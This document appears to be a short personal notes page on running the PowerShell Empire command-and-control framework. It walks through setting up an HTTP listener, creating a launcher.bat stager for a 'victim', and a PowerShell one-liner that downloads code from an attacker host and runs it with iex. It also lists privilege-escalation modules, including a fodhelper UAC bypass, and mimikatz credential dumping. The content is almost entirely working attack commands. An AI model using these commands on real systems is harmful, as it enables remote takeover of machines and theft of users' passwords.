start

To run, we need two shells open and type these commands

cd /opt/Empire
./ps-empire server                                                         ─╯
❯ ./ps-empire client

On the client side:

listeners 
use listeners http 
set host kali_ip
set port 80
execute 
back
usestager

Creating a launcher.bat

usestager windows/launcher_bat
set Listener http
execute
and copy the launcher_bat file over to the victim and run it 

OR 
on victim run: 
powershell "(New-Object Net.WebClient).DownloadString('http://kali_IP:80/download/powershell')|iex"

Once you get connect back, run "agents"

To interact simply type "interact UPBHTZEM"

you can run different commands. run "help" to see what you can do!

Privesc modules

usemodule powershell/privesc/powerup/allchecks
usemodule privesc/bypassuac_fodhelper

To run mimikatz, set up a listener, then,

usemodule/powershell/credentials/mimikatz/logonpasswords
execute 
then,  run the following command on the victim machine 
powershell "(New-Object Net.WebClient).DownloadString('http://kali_IP:80/download/powershell')|iex"

Once connected, it'll automatically run the command.

PreviousNew Empire!NextScripts I built

Last updated 1 year ago